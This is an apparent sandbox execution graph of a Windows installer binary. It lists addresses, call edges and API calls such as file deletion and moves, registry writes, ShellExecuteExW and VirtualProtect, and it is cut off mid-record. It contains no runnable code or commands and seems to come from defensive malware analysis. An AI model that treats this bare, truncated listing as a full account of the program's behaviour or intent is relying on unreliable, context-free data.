                                                                                                      execution_graph 4163 401941 4164 401943 4163->4164 4169 402c41 4164->4169 4170 402c4d 4169->4170 4215 40640a 4170->4215 4173 401948 4175 405afa 4173->4175 4257 405dc5 4175->4257 4178 405b22 DeleteFileW 4180 401951 4178->4180 4179 405b39 4181 405c64 4179->4181 4271 4063e8 lstrcpynW 4179->4271 4181->4180 4300 40672b FindFirstFileW 4181->4300 4183 405b5f 4184 405b72 4183->4184 4185 405b65 lstrcatW 4183->4185 4272 405d09 lstrlenW 4184->4272 4188 405b78 4185->4188 4189 405b88 lstrcatW 4188->4189 4190 405b7e 4188->4190 4192 405b93 lstrlenW FindFirstFileW 4189->4192 4190->4189 4190->4192 4194 405c59 4192->4194 4213 405bb5 4192->4213 4193 405c82 4303 405cbd lstrlenW CharPrevW 4193->4303 4194->4181 4197 405c3c FindNextFileW 4201 405c52 FindClose 4197->4201 4197->4213 4198 405ab2 5 API calls 4200 405c94 4198->4200 4202 405c98 4200->4202 4203 405cae 4200->4203 4201->4194 4202->4180 4206 405450 24 API calls 4202->4206 4205 405450 24 API calls 4203->4205 4205->4180 4208 405ca5 4206->4208 4207 405afa 60 API calls 4207->4213 4210 4061ae 36 API calls 4208->4210 4209 405450 24 API calls 4209->4197 4211 405cac 4210->4211 4211->4180 4213->4197 4213->4207 4213->4209 4276 4063e8 lstrcpynW 4213->4276 4277 405ab2 4213->4277 4285 405450 4213->4285 4296 4061ae MoveFileExW 4213->4296 4228 406417 4215->4228 4216 406662 4217 402c6e 4216->4217 4248 4063e8 lstrcpynW 4216->4248 4217->4173 4232 40667c 4217->4232 4219 406630 lstrlenW 4219->4228 4220 40640a 10 API calls 4220->4219 4223 406545 GetSystemDirectoryW 4223->4228 4225 406558 GetWindowsDirectoryW 4225->4228 4226 40667c 5 API calls 4226->4228 4227 4065d3 lstrcatW 4227->4228 4228->4216 4228->4219 4228->4220 4228->4223 4228->4225 4228->4226 4228->4227 4229 40658c SHGetSpecialFolderLocation 4228->4229 4230 40640a 10 API calls 4228->4230 4241 4062b6 4228->4241 4246 40632f wsprintfW 4228->4246 4247 4063e8 lstrcpynW 4228->4247 4229->4228 4231 4065a4 SHGetPathFromIDListW CoTaskMemFree 4229->4231 4230->4228 4231->4228 4239 406689 4232->4239 4233 4066ff 4234 406704 CharPrevW 4233->4234 4236 406725 4233->4236 4234->4233 4235 4066f2 CharNextW 4235->4233 4235->4239 4236->4173 4238 4066de CharNextW 4238->4239 4239->4233 4239->4235 4239->4238 4240 4066ed CharNextW 4239->4240 4253 405cea 4239->4253 4240->4235 4249 406255 4241->4249 4244 40631a 4244->4228 4245 4062ea RegQueryValueExW RegCloseKey 4245->4244 4246->4228 4247->4228 4248->4217 4250 406264 4249->4250 4251 406268 4250->4251 4252 40626d RegOpenKeyExW 4250->4252 4251->4244 4251->4245 4252->4251 4254 405cf0 4253->4254 4255 405d06 4254->4255 4256 405cf7 CharNextW 4254->4256 4255->4239 4256->4254 4306 4063e8 lstrcpynW 4257->4306 4259 405dd6 4307 405d68 CharNextW CharNextW 4259->4307 4262 405b1a 4262->4178 4262->4179 4263 40667c 5 API calls 4269 405dec 4263->4269 4264 405e1d lstrlenW 4265 405e28 4264->4265 4264->4269 4267 405cbd 3 API calls 4265->4267 4266 40672b 2 API calls 4266->4269 4268 405e2d GetFileAttributesW 4267->4268 4268->4262 4269->4262 4269->4264 4269->4266 4270 405d09 2 API calls 4269->4270 4270->4264 4271->4183 4273 405d17 4272->4273 4274 405d29 4273->4274 4275 405d1d CharPrevW 4273->4275 4274->4188 4275->4273 4275->4274 4276->4213 4313 405eb9 GetFileAttributesW 4277->4313 4280 405adf 4280->4213 4281 405ad5 DeleteFileW 4283 405adb 4281->4283 4282 405acd RemoveDirectoryW 4282->4283 4283->4280 4284 405aeb SetFileAttributesW 4283->4284 4284->4280 4286 40546b 4285->4286 4287 40550d 4285->4287 4288 405487 lstrlenW 4286->4288 4289 40640a 17 API calls 4286->4289 4287->4213 4290 4054b0 4288->4290 4291 405495 lstrlenW 4288->4291 4289->4288 4293 4054c3 4290->4293 4294 4054b6 SetWindowTextW 4290->4294 4291->4287 4292 4054a7 lstrcatW 4291->4292 4292->4290 4293->4287 4295 4054c9 SendMessageW SendMessageW SendMessageW 4293->4295 4294->4293 4295->4287 4297 4061cf 4296->4297 4298 4061c2 4296->4298 4297->4213 4316 406034 4298->4316 4301 406741 FindClose 4300->4301 4302 405c7e 4300->4302 4301->4302 4302->4180 4302->4193 4304 405c88 4303->4304 4305 405cd9 lstrcatW 4303->4305 4304->4198 4305->4304 4306->4259 4308 405d85 4307->4308 4310 405d97 4307->4310 4309 405d92 CharNextW 4308->4309 4308->4310 4312 405dbb 4309->4312 4311 405cea CharNextW 4310->4311 4310->4312 4311->4310 4312->4262 4312->4263 4314 405abe 4313->4314 4315 405ecb SetFileAttributesW 4313->4315 4314->4280 4314->4281 4314->4282 4315->4314 4317 406064 4316->4317 4318 40608a GetShortPathNameW 4316->4318 4343 405ede GetFileAttributesW CreateFileW 4317->4343 4320 4061a9 4318->4320 4321 40609f 4318->4321 4320->4297 4321->4320 4323 4060a7 wsprintfA 4321->4323 4322 40606e CloseHandle GetShortPathNameW 4322->4320 4325 406082 4322->4325 4324 40640a 17 API calls 4323->4324 4326 4060cf 4324->4326 4325->4318 4325->4320 4344 405ede GetFileAttributesW CreateFileW 4326->4344 4328 4060dc 4328->4320 4329 4060eb GetFileSize GlobalAlloc 4328->4329 4330 4061a2 CloseHandle 4329->4330 4331 40610d 4329->4331 4330->4320 4345 405f61 ReadFile 4331->4345 4336 406140 4338 405e43 4 API calls 4336->4338 4337 40612c lstrcpyA 4339 40614e 4337->4339 4338->4339 4340 406185 SetFilePointer 4339->4340 4352 405f90 WriteFile 4340->4352 4343->4322 4344->4328 4346 405f7f 4345->4346 4346->4330 4347 405e43 lstrlenA 4346->4347 4348 405e84 lstrlenA 4347->4348 4349 405e8c 4348->4349 4350 405e5d lstrcmpiA 4348->4350 4349->4336 4349->4337 4350->4349 4351 405e7b CharNextA 4350->4351 4351->4348 4353 405fae GlobalFree 4352->4353 4353->4330 4354 4015c1 4355 402c41 17 API calls 4354->4355 4356 4015c8 4355->4356 4357 405d68 4 API calls 4356->4357 4362 4015d1 4357->4362 4358 401631 4360 401663 4358->4360 4361 401636 4358->4361 4359 405cea CharNextW 4359->4362 4365 401423 24 API calls 4360->4365 4381 401423 4361->4381 4362->4358 4362->4359 4371 401617 GetFileAttributesW 4362->4371 4373 4059b9 4362->4373 4376 40591f CreateDirectoryW 4362->4376 4385 40599c CreateDirectoryW 4362->4385 4368 40165b 4365->4368 4370 40164a SetCurrentDirectoryW 4370->4368 4371->4362 4388 4067c2 GetModuleHandleA 4373->4388 4377 405970 GetLastError 4376->4377 4378 40596c 4376->4378 4377->4378 4379 40597f SetFileSecurityW 4377->4379 4378->4362 4379->4378 4380 405995 GetLastError 4379->4380 4380->4378 4382 405450 24 API calls 4381->4382 4383 401431 4382->4383 4384 4063e8 lstrcpynW 4383->4384 4384->4370 4386 4059b0 GetLastError 4385->4386 4387 4059ac 4385->4387 4386->4387 4387->4362 4389 4067e8 GetProcAddress 4388->4389 4390 4067de 4388->4390 4392 4059c0 4389->4392 4394 406752 GetSystemDirectoryW 4390->4394 4392->4362 4393 4067e4 4393->4389 4393->4392 4395 406774 wsprintfW LoadLibraryExW 4394->4395 4395->4393 4397 4053c4 4398 4053d4 4397->4398 4399 4053e8 4397->4399 4400 405431 4398->4400 4401 4053da 4398->4401 4402 4053f0 IsWindowVisible 4399->4402 4409 405410 4399->4409 4403 405436 CallWindowProcW 4400->4403 4411 4043ab 4401->4411 4402->4400 4405 4053fd 4402->4405 4406 4053e4 4403->4406 4414 404d1a SendMessageW 4405->4414 4409->4403 4419 404d9a 4409->4419 4412 4043c3 4411->4412 4413 4043b4 SendMessageW 4411->4413 4412->4406 4413->4412 4415 404d79 SendMessageW 4414->4415 4416 404d3d GetMessagePos ScreenToClient SendMessageW 4414->4416 4417 404d71 4415->4417 4416->4417 4418 404d76 4416->4418 4417->4409 4418->4415 4428 4063e8 lstrcpynW 4419->4428 4421 404dad 4429 40632f wsprintfW 4421->4429 4423 404db7 4430 40140b 4423->4430 4427 404dc7 4427->4400 4428->4421 4429->4423 4434 401389 4430->4434 4433 4063e8 lstrcpynW 4433->4427 4436 401390 4434->4436 4435 4013fe 4435->4433 4436->4435 4437 4013cb MulDiv SendMessageW 4436->4437 4437->4436 4882 6f942993 4883 6f9429e3 4882->4883 4884 6f9429a3 VirtualProtect 4882->4884 4884->4883 4885 401e49 4886 402c1f 17 API calls 4885->4886 4887 401e4f 4886->4887 4888 402c1f 17 API calls 4887->4888 4889 401e5b 4888->4889 4890 401e72 EnableWindow 4889->4890 4891 401e67 ShowWindow 4889->4891 4892 402ac5 4890->4892 4891->4892 4893 40264a 4894 402c1f 17 API calls 4893->4894 4896 402659 4894->4896 4895 402796 4896->4895 4897 4026a3 ReadFile 4896->4897 4898 40273c 4896->4898 4899 405f61 ReadFile 4896->4899 4901 4026e3 MultiByteToWideChar 4896->4901 4902 402798 4896->4902 4904 402709 SetFilePointer MultiByteToWideChar 4896->4904 4905 4027a9 4896->4905 4897->4895 4897->4896 4898->4895 4898->4896 4907 405fbf SetFilePointer 4898->4907 4899->4896 4901->4896 4916 40632f wsprintfW 4902->4916 4904->4896 4905->4895 4906 4027ca SetFilePointer 4905->4906 4906->4895 4908 405fdb 4907->4908 4915 405ff3 4907->4915 4909 405f61 ReadFile 4908->4909 4910 405fe7 4909->4910 4911 406024 SetFilePointer 4910->4911 4912 405ffc SetFilePointer 4910->4912 4910->4915 4911->4915 4912->4911 4913 406007 4912->4913 4914 405f90 WriteFile 4913->4914 4914->4915 4915->4898 4916->4895 4917 404dcc GetDlgItem GetDlgItem 4918 404e1e 7 API calls 4917->4918 4927 405037 4917->4927 4919 404ec1 DeleteObject 4918->4919 4920 404eb4 SendMessageW 4918->4920 4921 404eca 4919->4921 4920->4919 4923 404ed9 4921->4923 4924 404f01 4921->4924 4922 40511b 4925 4051c7 4922->4925 4930 4053af 4922->4930 4936 405174 SendMessageW 4922->4936 4926 40640a 17 API calls 4923->4926 4929 40435f 18 API calls 4924->4929 4931 4051d1 SendMessageW 4925->4931 4932 4051d9 4925->4932 4933 404ee3 SendMessageW SendMessageW 4926->4933 4927->4922 4928 4050fc 4927->4928 4934 405097 4927->4934 4928->4922 4938 40510d SendMessageW 4928->4938 4935 404f15 4929->4935 4937 4043c6 8 API calls 4930->4937 4931->4932 4944 4051f2 4932->4944 4945 4051eb ImageList_Destroy 4932->4945 4949 405202 4932->4949 4933->4921 4939 404d1a 5 API calls 4934->4939 4940 40435f 18 API calls 4935->4940 4936->4930 4942 405189 SendMessageW 4936->4942 4943 4053bd 4937->4943 4938->4922 4952 4050a8 4939->4952 4953 404f23 4940->4953 4941 405371 4941->4930 4950 405383 ShowWindow GetDlgItem ShowWindow 4941->4950 4947 40519c 4942->4947 4948 4051fb GlobalFree 4944->4948 4944->4949 4945->4944 4946 404ff8 GetWindowLongW SetWindowLongW 4951 405011 4946->4951 4958 4051ad SendMessageW 4947->4958 4948->4949 4949->4941 4963 404d9a 4 API calls 4949->4963 4968 40523d 4949->4968 4950->4930 4954 405017 ShowWindow 4951->4954 4955 40502f 4951->4955 4952->4928 4953->4946 4957 404f73 SendMessageW 4953->4957 4959 404ff2 4953->4959 4961 404fc0 SendMessageW 4953->4961 4962 404faf SendMessageW 4953->4962 4973 404394 SendMessageW 4954->4973 4974 404394 SendMessageW 4955->4974 4957->4953 4958->4925 4959->4946 4959->4951 4961->4953 4962->4953 4963->4968 4964 40502a 4964->4930 4965 405347 InvalidateRect 4965->4941 4969 40535d 4965->4969 4966 405281 4966->4965 4971 4052e2 4966->4971 4972 4052f5 SendMessageW SendMessageW 4966->4972 4967 40526b SendMessageW 4967->4966 4968->4966 4968->4967 4975 404cd5 4969->4975 4971->4972 4972->4966 4973->4964 4974->4927 4978 404c0c 4975->4978 4977 404cea 4977->4941 4979 404c25 4978->4979 4980 40640a 17 API calls 4979->4980 4981 404c89 4980->4981 4982 40640a 17 API calls 4981->4982 4983 404c94 4982->4983 4984 40640a 17 API calls 4983->4984 4985 404caa lstrlenW wsprintfW SetDlgItemTextW 4984->4985 4985->4977 5291 4016cc 5292 402c41 17 API calls 5291->5292 5293 4016d2 GetFullPathNameW 5292->5293 5294 4016ec 5293->5294 5295 40170e 5293->5295 5294->5295 5298 40672b 2 API calls 5294->5298 5296 401723 GetShortPathNameW 5295->5296 5297 402ac5 5295->5297 5296->5297 5299 4016fe 5298->5299 5299->5295 5301 4063e8 lstrcpynW 5299->5301 5301->5295 5302 40234e 5303 402c41 17 API calls 5302->5303 5304 40235d 5303->5304 5305 402c41 17 API calls 5304->5305 5306 402366 5305->5306 5307 402c41 17 API calls 5306->5307 5308 402370 GetPrivateProfileStringW 5307->5308 5309 4044cf lstrlenW 5310 4044f0 WideCharToMultiByte 5309->5310 5311 4044ee 5309->5311 5311->5310 5312 404850 5313 40487c 5312->5313 5314 40488d 5312->5314 5373 405a32 GetDlgItemTextW 5313->5373 5315 404899 GetDlgItem 5314->5315 5322 4048f8 5314->5322 5318 4048ad 5315->5318 5317 404887 5320 40667c 5 API calls 5317->5320 5321 4048c1 SetWindowTextW 5318->5321 5325 405d68 4 API calls 5318->5325 5319 4049dc 5370 404b8b 5319->5370 5375 405a32 GetDlgItemTextW 5319->5375 5320->5314 5326 40435f 18 API calls 5321->5326 5322->5319 5327 40640a 17 API calls 5322->5327 5322->5370 5324 4043c6 8 API calls 5329 404b9f 5324->5329 5330 4048b7 5325->5330 5331 4048dd 5326->5331 5332 40496c SHBrowseForFolderW 5327->5332 5328 404a0c 5333 405dc5 18 API calls 5328->5333 5330->5321 5337 405cbd 3 API calls 5330->5337 5334 40435f 18 API calls 5331->5334 5332->5319 5335 404984 CoTaskMemFree 5332->5335 5336 404a12 5333->5336 5338 4048eb 5334->5338 5339 405cbd 3 API calls 5335->5339 5376 4063e8 lstrcpynW 5336->5376 5337->5321 5374 404394 SendMessageW 5338->5374 5341 404991 5339->5341 5344 4049c8 SetDlgItemTextW 5341->5344 5348 40640a 17 API calls 5341->5348 5343 4048f1 5346 4067c2 5 API calls 5343->5346 5344->5319 5345 404a29 5347 4067c2 5 API calls 5345->5347 5346->5322 5355 404a30 5347->5355 5349 4049b0 lstrcmpiW 5348->5349 5349->5344 5351 4049c1 lstrcatW 5349->5351 5350 404a71 5377 4063e8 lstrcpynW 5350->5377 5351->5344 5353 404a78 5354 405d68 4 API calls 5353->5354 5356 404a7e GetDiskFreeSpaceW 5354->5356 5355->5350 5359 405d09 2 API calls 5355->5359 5360 404ac9 5355->5360 5358 404aa2 MulDiv 5356->5358 5356->5360 5358->5360 5359->5355 5361 404cd5 20 API calls 5360->5361 5371 404b3a 5360->5371 5363 404b27 5361->5363 5362 404b5d 5378 404381 EnableWindow 5362->5378 5365 404b3c SetDlgItemTextW 5363->5365 5366 404b2c 5363->5366 5364 40140b 2 API calls 5364->5362 5365->5371 5368 404c0c 20 API calls 5366->5368 5368->5371 5369 404b79 5369->5370 5379 4047a9 5369->5379 5370->5324 5371->5362 5371->5364 5373->5317 5374->5343 5375->5328 5376->5345 5377->5353 5378->5369 5380 4047b7 5379->5380 5381 4047bc SendMessageW 5379->5381 5380->5381 5381->5370 5382 401b53 5383 402c41 17 API calls 5382->5383 5384 401b5a 5383->5384 5385 402c1f 17 API calls 5384->5385 5386 401b63 wsprintfW 5385->5386 5387 402ac5 5386->5387 5388 6f941000 5391 6f94101b 5388->5391 5398 6f941516 5391->5398 5393 6f941020 5394 6f941027 GlobalAlloc 5393->5394 5395 6f941024 5393->5395 5394->5395 5396 6f94153d 3 API calls 5395->5396 5397 6f941019 5396->5397 5400 6f94151c 5398->5400 5399 6f941522 5399->5393 5400->5399 5401 6f94152e GlobalFree 5400->5401 5401->5393 5402 401956 5403 402c41 17 API calls 5402->5403 5404 40195d lstrlenW 5403->5404 5405 402592 5404->5405 5413 4014d7 5414 402c1f 17 API calls 5413->5414 5415 4014dd Sleep 5414->5415 5417 402ac5 5415->5417 5418 401f58 5419 402c41 17 API calls 5418->5419 5420 401f5f 5419->5420 5421 40672b 2 API calls 5420->5421 5422 401f65 5421->5422 5423 401f76 5422->5423 5425 40632f wsprintfW 5422->5425 5425->5423 5426 402259 5427 402c41 17 API calls 5426->5427 5428 40225f 5427->5428 5429 402c41 17 API calls 5428->5429 5430 402268 5429->5430 5431 402c41 17 API calls 5430->5431 5432 402271 5431->5432 5433 40672b 2 API calls 5432->5433 5434 40227a 5433->5434 5435 40228b lstrlenW lstrlenW 5434->5435 5436 40227e 5434->5436 5438 405450 24 API calls 5435->5438 5437 405450 24 API calls 5436->5437 5440 402286 5437->5440 5439 4022c9 SHFileOperationW 5438->5439 5439->5436 5439->5440 5282 40175c 5283 402c41 17 API calls 5282->5283 5284 401763 5283->5284 5285 405f0d 2 API calls 5284->5285 5286 40176a 5285->5286 5287 405f0d 2 API calls 5286->5287 5287->5286 5441 401d5d GetDlgItem GetClientRect 5442 402c41 17 API calls 5441->5442 5443 401d8f LoadImageW SendMessageW 5442->5443 5444 402ac5 5443->5444 5445 401dad DeleteObject 5443->5445 5445->5444 5446 4022dd 5447 4022f7 5446->5447 5448 4022e4 5446->5448 5449 40640a 17 API calls 5448->5449 5450 4022f1 5449->5450 5451 405a4e MessageBoxIndirectW 5450->5451 5451->5447 5452 401563 5453 402a6b 5452->5453 5456 40632f wsprintfW 5453->5456 5455 402a70 5456->5455 4438 4023e4 4439 402c41 17 API calls 4438->4439 4440 4023f6 4439->4440 4441 402c41 17 API calls 4440->4441 4442 402400 4441->4442 4455 402cd1 4442->4455 4445 402438 4448 402444 4445->4448 4459 402c1f 4445->4459 4446 40288b 4447 402c41 17 API calls 4449 40242e lstrlenW 4447->4449 4451 402463 RegSetValueExW 4448->4451 4462 4031d6 4448->4462 4449->4445 4453 402479 RegCloseKey 4451->4453 4453->4446 4456 402cec 4455->4456 4477 406283 4456->4477 4460 40640a 17 API calls 4459->4460 4461 402c34 4460->4461 4461->4448 4463 403201 4462->4463 4464 4031e5 SetFilePointer 4462->4464 4481 4032de GetTickCount 4463->4481 4464->4463 4467 405f61 ReadFile 4468 403221 4467->4468 4469 4032de 42 API calls 4468->4469 4476 40329e 4468->4476 4470 403238 4469->4470 4471 4032a4 ReadFile 4470->4471 4474 403247 4470->4474 4470->4476 4471->4476 4473 405f61 ReadFile 4473->4474 4474->4473 4475 405f90 WriteFile 4474->4475 4474->4476 4475->4474 4476->4451 4478 406292 4477->4478 4479 402410 4478->4479 4480 40629d RegCreateKeyExW 4478->4480 4479->4445 4479->4446 4479->4447 4480->4479 4482 403436 4481->4482 4483 40330c 4481->4483 4484 402e8e 32 API calls 4482->4484 4494 40345d SetFilePointer 4483->4494 4490 403208 4484->4490 4486 403317 SetFilePointer 4492 40333c 4486->4492 4490->4467 4490->4476 4491 405f90 WriteFile 4491->4492 4492->4490 4492->4491 4493 403417 SetFilePointer 4492->4493 4495 403447 4492->4495 4498 406943 4492->4498 4505 402e8e 4492->4505 4493->4482 4494->4486 4496 405f61 ReadFile 4495->4496 4497 40345a 4496->4497 4497->4492 4499 406968 4498->4499 4500 406970 4498->4500 4499->4492 4500->4499 4501 406a00 GlobalAlloc 4500->4501 4502 4069f7 GlobalFree 4500->4502 4503 406a77 GlobalAlloc 4500->4503 4504 406a6e GlobalFree 4500->4504 4501->4499 4501->4500 4502->4501 4503->4499 4503->4500 4504->4503 4506 402eb7 4505->4506 4507 402e9f 4505->4507 4510 402ec7 GetTickCount 4506->4510 4511 402ebf 4506->4511 4508 402ea8 DestroyWindow 4507->4508 4509 402eaf 4507->4509 4508->4509 4509->4492 4510->4509 4513 402ed5 4510->4513 4520 4067fe 4511->4520 4514 402f0a CreateDialogParamW ShowWindow 4513->4514 4515 402edd 4513->4515 4514->4509 4515->4509 4524 402e72 4515->4524 4517 402eeb wsprintfW 4518 405450 24 API calls 4517->4518 4519 402f08 4518->4519 4519->4509 4521 40681b PeekMessageW 4520->4521 4522 406811 DispatchMessageW 4521->4522 4523 40682b 4521->4523 4522->4521 4523->4509 4525 402e81 4524->4525 4526 402e83 MulDiv 4524->4526 4525->4526 4526->4517 5464 402868 5465 402c41 17 API calls 5464->5465 5466 40286f FindFirstFileW 5465->5466 5467 402897 5466->5467 5470 402882 5466->5470 5472 40632f wsprintfW 5467->5472 5469 4028a0 5473 4063e8 lstrcpynW 5469->5473 5472->5469 5473->5470 5474 401968 5475 402c1f 17 API calls 5474->5475 5476 40196f 5475->5476 5477 402c1f 17 API calls 5476->5477 5478 40197c 5477->5478 5479 402c41 17 API calls 5478->5479 5480 401993 lstrlenW 5479->5480 5482 4019a4 5480->5482 5481 4019e5 5482->5481 5486 4063e8 lstrcpynW 5482->5486 5484 4019d5 5484->5481 5485 4019da lstrlenW 5484->5485 5485->5481 5486->5484 5487 6f94103d 5488 6f94101b 5 API calls 5487->5488 5489 6f941056 5488->5489 5490 40166a 5491 402c41 17 API calls 5490->5491 5492 401670 5491->5492 5493 40672b 2 API calls 5492->5493 5494 401676 5493->5494 5015 40176f 5016 402c41 17 API calls 5015->5016 5017 401776 5016->5017 5018 401796 5017->5018 5019 40179e 5017->5019 5055 4063e8 lstrcpynW 5018->5055 5056 4063e8 lstrcpynW 5019->5056 5022 4017a9 5024 405cbd 3 API calls 5022->5024 5023 40179c 5026 40667c 5 API calls 5023->5026 5025 4017af lstrcatW 5024->5025 5025->5023 5039 4017bb 5026->5039 5027 40672b 2 API calls 5027->5039 5028 4017f7 5030 405eb9 2 API calls 5028->5030 5030->5039 5031 4017cd CompareFileTime 5031->5039 5032 40188d 5033 405450 24 API calls 5032->5033 5036 401897 5033->5036 5034 405450 24 API calls 5044 401879 5034->5044 5035 4063e8 lstrcpynW 5035->5039 5037 4031d6 44 API calls 5036->5037 5038 4018aa 5037->5038 5040 4018be SetFileTime 5038->5040 5042 4018d0 CloseHandle 5038->5042 5039->5027 5039->5028 5039->5031 5039->5032 5039->5035 5041 40640a 17 API calls 5039->5041 5051 405a4e MessageBoxIndirectW 5039->5051 5053 401864 5039->5053 5054 405ede GetFileAttributesW CreateFileW 5039->5054 5040->5042 5041->5039 5043 4018e1 5042->5043 5042->5044 5045 4018e6 5043->5045 5046 4018f9 5043->5046 5047 40640a 17 API calls 5045->5047 5048 40640a 17 API calls 5046->5048 5049 4018ee lstrcatW 5047->5049 5050 401901 5048->5050 5049->5050 5052 405a4e MessageBoxIndirectW 5050->5052 5051->5039 5052->5044 5053->5034 5053->5044 5054->5039 5055->5023 5056->5022 5057 4027ef 5058 4027f6 5057->5058 5061 402a70 5057->5061 5059 402c1f 17 API calls 5058->5059 5060 4027fd 5059->5060 5062 40280c SetFilePointer 5060->5062 5062->5061 5063 40281c 5062->5063 5065 40632f wsprintfW 5063->5065 5065->5061 5495 401a72 5496 402c1f 17 API calls 5495->5496 5497 401a7b 5496->5497 5498 402c1f 17 API calls 5497->5498 5499 401a20 5498->5499 5500 406af2 5502 406976 5500->5502 5501 4072e1 5502->5501 5503 406a00 GlobalAlloc 5502->5503 5504 4069f7 GlobalFree 5502->5504 5505 406a77 GlobalAlloc 5502->5505 5506 406a6e GlobalFree 5502->5506 5503->5501 5503->5502 5504->5503 5505->5501 5505->5502 5506->5505 5507 401573 5508 401583 ShowWindow 5507->5508 5509 40158c 5507->5509 5508->5509 5510 402ac5 5509->5510 5511 40159a ShowWindow 5509->5511 5511->5510 5512 401cf3 5513 402c1f 17 API calls 5512->5513 5514 401cf9 IsWindow 5513->5514 5515 401a20 5514->5515 5516 402df3 5517 402e05 SetTimer 5516->5517 5518 402e1e 5516->5518 5517->5518 5519 402e6c 5518->5519 5520 402e72 MulDiv 5518->5520 5521 402e2c wsprintfW SetWindowTextW SetDlgItemTextW 5520->5521 5521->5519 5523 4014f5 SetForegroundWindow 5524 402ac5 5523->5524 5525 402576 5526 402c41 17 API calls 5525->5526 5527 40257d 5526->5527 5530 405ede GetFileAttributesW CreateFileW 5527->5530 5529 402589 5530->5529 5531 401b77 5532 401bc8 5531->5532 5534 401b84 5531->5534 5535 401bf2 GlobalAlloc 5532->5535 5536 401bcd 5532->5536 5533 401c0d 5538 40640a 17 API calls 5533->5538 5546 4022f7 5533->5546 5534->5533 5540 401b9b 5534->5540 5537 40640a 17 API calls 5535->5537 5536->5546 5552 4063e8 lstrcpynW 5536->5552 5537->5533 5539 4022f1 5538->5539 5544 405a4e MessageBoxIndirectW 5539->5544 5550 4063e8 lstrcpynW 5540->5550 5543 401bdf GlobalFree 5543->5546 5544->5546 5545 401baa 5551 4063e8 lstrcpynW 5545->5551 5548 401bb9 5553 4063e8 lstrcpynW 5548->5553 5550->5545 5551->5548 5552->5543 5553->5546 5257 4024f8 5258 402c81 17 API calls 5257->5258 5259 402502 5258->5259 5260 402c1f 17 API calls 5259->5260 5261 40250b 5260->5261 5262 402533 RegEnumValueW 5261->5262 5263 402527 RegEnumKeyW 5261->5263 5265 40288b 5261->5265 5264 402548 5262->5264 5266 40254f RegCloseKey 5262->5266 5263->5266 5264->5266 5266->5265 5268 40167b 5269 402c41 17 API calls 5268->5269 5270 401682 5269->5270 5271 402c41 17 API calls 5270->5271 5272 40168b 5271->5272 5273 402c41 17 API calls 5272->5273 5274 401694 MoveFileW 5273->5274 5275 4016a7 5274->5275 5281 4016a0 5274->5281 5276 40672b 2 API calls 5275->5276 5278 402250 5275->5278 5279 4016b6 5276->5279 5277 401423 24 API calls 5277->5278 5279->5278 5280 4061ae 36 API calls 5279->5280 5280->5281 5281->5277 5561 401e7d 5562 402c41 17 API calls 5561->5562 5563 401e83 5562->5563 5564 402c41 17 API calls 5563->5564 5565 401e8c 5564->5565 5566 402c41 17 API calls 5565->5566 5567 401e95 5566->5567 5568 402c41 17 API calls 5567->5568 5569 401e9e 5568->5569 5570 401423 24 API calls 5569->5570 5571 401ea5 5570->5571 5578 405a14 ShellExecuteExW 5571->5578 5573 401ee7 5576 40288b 5573->5576 5579 406873 WaitForSingleObject 5573->5579 5575 401f01 CloseHandle 5575->5576 5578->5573 5580 40688d 5579->5580 5581 40689f GetExitCodeProcess 5580->5581 5582 4067fe 2 API calls 5580->5582 5581->5575 5583 406894 WaitForSingleObject 5582->5583 5583->5580 5584 4019ff 5585 402c41 17 API calls 5584->5585 5586 401a06 5585->5586 5587 402c41 17 API calls 5586->5587 5588 401a0f 5587->5588 5589 401a16 lstrcmpiW 5588->5589 5590 401a28 lstrcmpW 5588->5590 5591 401a1c 5589->5591 5590->5591 5592 401000 5593 401037 BeginPaint GetClientRect 5592->5593 5594 40100c DefWindowProcW 5592->5594 5596 4010f3 5593->5596 5597 401179 5594->5597 5598 401073 CreateBrushIndirect FillRect DeleteObject 5596->5598 5599 4010fc 5596->5599 5598->5596 5600 401102 CreateFontIndirectW 5599->5600 5601 401167 EndPaint 5599->5601 5600->5601 5602 401112 6 API calls 5600->5602 5601->5597 5602->5601 5603 6f9416d4 5604 6f941703 5603->5604 5605 6f941b5f 22 API calls 5604->5605 5606 6f94170a 5605->5606 5607 6f941711 5606->5607 5608 6f94171d 5606->5608 5609 6f941272 2 API calls 5607->5609 5610 6f941744 5608->5610 5611 6f941727 5608->5611 5614 6f94171b 5609->5614 5612 6f94176e 5610->5612 5613 6f94174a 5610->5613 5615 6f94153d 3 API calls 5611->5615 5617 6f94153d 3 API calls 5612->5617 5616 6f9415b4 3 API calls 5613->5616 5618 6f94172c 5615->5618 5619 6f94174f 5616->5619 5617->5614 5620 6f9415b4 3 API calls 5618->5620 5621 6f941272 2 API calls 5619->5621 5622 6f941732 5620->5622 5623 6f941755 GlobalFree 5621->5623 5624 6f941272 2 API calls 5622->5624 5623->5614 5626 6f941769 GlobalFree 5623->5626 5625 6f941738 GlobalFree 5624->5625 5625->5614 5626->5614 5627 401503 5628 40150b 5627->5628 5630 40151e 5627->5630 5629 402c1f 17 API calls 5628->5629 5629->5630 5631 6f942c57 5632 6f942c6f 5631->5632 5633 6f94158f 2 API calls 5632->5633 5634 6f942c8a 5633->5634 4527 402484 4538 402c81 4527->4538 4530 402c41 17 API calls 4531 402497 4530->4531 4532 4024a2 RegQueryValueExW 4531->4532 4534 40288b 4531->4534 4533 4024c2 4532->4533 4535 4024c8 RegCloseKey 4532->4535 4533->4535 4543 40632f wsprintfW 4533->4543 4535->4534 4539 402c41 17 API calls 4538->4539 4540 402c98 4539->4540 4541 406255 RegOpenKeyExW 4540->4541 4542 40248e 4541->4542 4542->4530 4543->4535 5635 402104 5636 402c41 17 API calls 5635->5636 5637 40210b 5636->5637 5638 402c41 17 API calls 5637->5638 5639 402115 5638->5639 5640 402c41 17 API calls 5639->5640 5641 40211f 5640->5641 5642 402c41 17 API calls 5641->5642 5643 402129 5642->5643 5644 402c41 17 API calls 5643->5644 5646 402133 5644->5646 5645 402172 CoCreateInstance 5650 402191 5645->5650 5646->5645 5647 402c41 17 API calls 5646->5647 5647->5645 5648 401423 24 API calls 5649 402250 5648->5649 5650->5648 5650->5649 4787 403e86 4788 403fd9 4787->4788 4789 403e9e 4787->4789 4790 403fea GetDlgItem GetDlgItem 4788->4790 4799 40402a 4788->4799 4789->4788 4791 403eaa 4789->4791 4792 40435f 18 API calls 4790->4792 4794 403eb5 SetWindowPos 4791->4794 4795 403ec8 4791->4795 4798 404014 SetClassLongW 4792->4798 4793 404084 4800 4043ab SendMessageW 4793->4800 4805 403fd4 4793->4805 4794->4795 4796 403ee5 4795->4796 4797 403ecd ShowWindow 4795->4797 4801 403f07 4796->4801 4802 403eed DestroyWindow 4796->4802 4797->4796 4803 